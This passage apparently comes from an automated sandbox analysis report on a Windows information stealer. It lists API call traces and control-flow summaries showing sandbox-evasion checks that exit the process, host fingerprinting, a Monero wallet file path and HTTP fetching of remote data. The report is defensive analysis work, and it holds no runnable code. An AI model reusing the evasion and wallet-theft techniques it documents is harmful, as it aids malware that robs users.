                          • GetProcAddress.KERNEL32(75070000,0128CA98), ref: 0041A47F
                          • GetProcAddress.KERNEL32(75070000,0128CAF8), ref: 0041A497
                          • GetProcAddress.KERNEL32(74E50000,01276580), ref: 0041A4B8
                          • GetProcAddress.KERNEL32(74E50000,01276320), ref: 0041A4D1
                          • GetProcAddress.KERNEL32(75320000,01276360), ref: 0041A4F2
                          • GetProcAddress.KERNEL32(75320000,0128CCA8), ref: 0041A50A
                          • GetProcAddress.KERNEL32(6F060000,012762C0), ref: 0041A530
                          • GetProcAddress.KERNEL32(6F060000,01276340), ref: 0041A548
                          • GetProcAddress.KERNEL32(6F060000,01276400), ref: 0041A560
                          • GetProcAddress.KERNEL32(6F060000,0128CCC0), ref: 0041A579
                          • GetProcAddress.KERNEL32(6F060000,01276440), ref: 0041A591
                          • GetProcAddress.KERNEL32(6F060000,01276460), ref: 0041A5A9
                          • GetProcAddress.KERNEL32(6F060000,012764C0), ref: 0041A5C2
                          • GetProcAddress.KERNEL32(6F060000,01276520), ref: 0041A5DA
                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                          • GetProcAddress.KERNEL32(74E00000,0128CCD8), ref: 0041A629
                          • GetProcAddress.KERNEL32(74E00000,01288940), ref: 0041A641
                          • GetProcAddress.KERNEL32(74E00000,0128CD38), ref: 0041A659
                          • GetProcAddress.KERNEL32(74E00000,0128CD50), ref: 0041A672
                          • GetProcAddress.KERNEL32(74DF0000,01276540), ref: 0041A693
                          • GetProcAddress.KERNEL32(6F9B0000,0128CDC8), ref: 0041A6B4
                          • GetProcAddress.KERNEL32(6F9B0000,012765E0), ref: 0041A6CD
                          • GetProcAddress.KERNEL32(6F9B0000,0128CB88), ref: 0041A6E5
                          • GetProcAddress.KERNEL32(6F9B0000,0128CBA0), ref: 0041A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                          • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                          • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                          • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                          Control-flow Graph (legend: Executed / Not Executed; graph image not preserved)
                          Graph root 00406280, covering 00406280-0040652D: calls to subfunctions 0041A7A0, 004047B0 and 0041A740, then InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, optional InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, a read loop around InternetReadFile (00406456-00406480), and three InternetCloseHandle calls on the exit paths.
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                          • InternetCloseHandle.WININET(00000000), ref: 004064EF
                          • InternetCloseHandle.WININET(00000000), ref: 004064F9
                          • InternetCloseHandle.WININET(00000000), ref: 00406503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 4bffbc6298ce5bde29073934a1559e313ab5fcbc159c72d221c735d430b420b5
                          • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                          • Opcode Fuzzy Hash: 4bffbc6298ce5bde29073934a1559e313ab5fcbc159c72d221c735d430b420b5
                          • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                          Control-flow Graph (legend: Executed / Not Executed; graph image not preserved)
                          Graph root 00415510, covering 00415510-00415AC6: repeated StrCmpCA checks against "ERROR" after calls to 004151F0 and 004152C0, with a Sleep at 00415A16-00415A21 that loops back to 0041557C.
                          APIs
                            • Part of subcall function 0041A820: lstrlen.KERNEL32(00404F05,?,?,00404F05,00420DDE), ref: 0041A82B
                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0041A885
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 0041532F
                            • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 00415383
                            • Part of subcall function 004152C0: lstrlen.KERNEL32(00000000), ref: 004153AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                          • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                          • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                          • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 4117a0-4117cd call 41aad0 StrCmpCA 1304 4117d7-4117f1 call 41aad0 1301->1304 1305 4117cf-4117d1 ExitProcess 1301->1305 1309 4117f4-4117f8 1304->1309 1310 4119c2-4119cd call 41a800 1309->1310 1311 4117fe-411811 1309->1311 1313 411817-41181a 1311->1313 1314 41199e-4119bd 1311->1314 1316 411821-411830 call 41a820 1313->1316 1317 411849-411858 call 41a820 1313->1317 1318 4118ad-4118be StrCmpCA 1313->1318 1319 4118cf-4118e0 StrCmpCA 1313->1319 1320 41198f-411999 call 41a820 1313->1320 1321 4118f1-411902 StrCmpCA 1313->1321 1322 411951-411962 StrCmpCA 1313->1322 1323 411970-411981 StrCmpCA 1313->1323 1324 411913-411924 StrCmpCA 1313->1324 1325 411932-411943 StrCmpCA 1313->1325 1326 411835-411844 call 41a820 1313->1326 1327 41185d-41186e StrCmpCA 1313->1327 1328 41187f-411890 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1344 4118c0-4118c3 1318->1344 1345 4118ca 1318->1345 1346 4118e2-4118e5 1319->1346 1347 4118ec 1319->1347 1320->1314 1348 411904-411907 1321->1348 1349 41190e 1321->1349 1331 411964-411967 1322->1331 1332 41196e 1322->1332 1334 411983-411986 1323->1334 1335 41198d 1323->1335 1350 411930 1324->1350 1351 411926-411929 1324->1351 1329 411945-411948 1325->1329 1330 41194f 1325->1330 1326->1314 1340 411870-411873 1327->1340 1341 41187a 1327->1341 1342 411892-41189c 1328->1342 1343 41189e-4118a1 1328->1343 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 4118a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 004117C5
                          • ExitProcess.KERNEL32 ref: 004117D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 7f408f1591d611580e04ec924439935c28397a15e27e27f9e4116566d6ebdbf4
                          • Instruction ID: 0405e5a3f07d781a82fc2c844c85a24eb00bc6dbff14658bd7033dab7d51b311
                          • Opcode Fuzzy Hash: 7f408f1591d611580e04ec924439935c28397a15e27e27f9e4116566d6ebdbf4
                          • Instruction Fuzzy Hash: DD517DB4A20209EFCB04DFA0D954BFE77B5BF44304F10804AE516A7361D778E992CB6A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 417500-41754a GetWindowsDirectoryA 1357 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1356->1357 1358 41754c 1356->1358 1365 4175d8-4175df 1357->1365 1358->1357 1366 4175e1-4175fa call 418d00 1365->1366 1367 4175fc-417617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 417619-417626 call 41a740 1367->1369 1370 417628-417658 wsprintfA call 41a740 1367->1370 1377 41767e-41768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041760A
                          • wsprintfA.USER32 ref: 00417640
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$B
                          • API String ID: 1544550907-183544611
                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                          • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                          • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280630), ref: 004198A1
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280798), ref: 004198BA
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280678), ref: 004198D2
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012806D8), ref: 004198EA
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012805E8), ref: 00419903
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012889B0), ref: 0041991B
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012766C0), ref: 00419933
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01276680), ref: 0041994C
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280828), ref: 00419964
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280618), ref: 0041997C
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280840), ref: 00419995
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280600), ref: 004199AD
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,012767C0), ref: 004199C5
                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01280558), ref: 004199DE
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                            • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?), ref: 0040116A
                            • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                            • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040112B
                            • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00401132
                            • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                            • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                            • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                            • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32 ref: 00416774
                            • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                            • Part of subcall function 00417850: RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                            • Part of subcall function 004178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                          • Sleep.KERNEL32(00001770), ref: 00416B04
                          • CloseHandle.KERNEL32(?,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                          • ExitProcess.KERNEL32 ref: 00416B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 299f5a64ae457bbbd5e4e5de96f813cf4445bf982773f8a185f9c4a1304d420e
                          • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                          • Opcode Fuzzy Hash: 299f5a64ae457bbbd5e4e5de96f813cf4445bf982773f8a185f9c4a1304d420e
                          • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 401220-401247 call 4189b0 GlobalMemoryStatusEx 1439 401273-40127a 1436->1439 1440 401249-401271 call 41da00 * 2 1436->1440 1442 401281-401285 1439->1442 1440->1442 1444 401287 1442->1444 1445 40129a-40129d 1442->1445 1447 401292-401294 ExitProcess 1444->1447 1448 401289-401290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                          • __aulldiv.LIBCMT ref: 00401258
                          • __aulldiv.LIBCMT ref: 00401266
                          • ExitProcess.KERNEL32 ref: 00401294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                          • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                          • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 416af3 1451 416b0a 1450->1451 1453 416aba-416ad7 call 41aad0 OpenEventA 1451->1453 1454 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1451->1454 1459 416af5-416b04 CloseHandle Sleep 1453->1459 1460 416ad9-416af1 call 41aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                          • Sleep.KERNEL32(00001770), ref: 00416B04
                          • CloseHandle.KERNEL32(?,00000000,?,01288960,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                          • ExitProcess.KERNEL32 ref: 00416B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                          • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                          • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                          • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
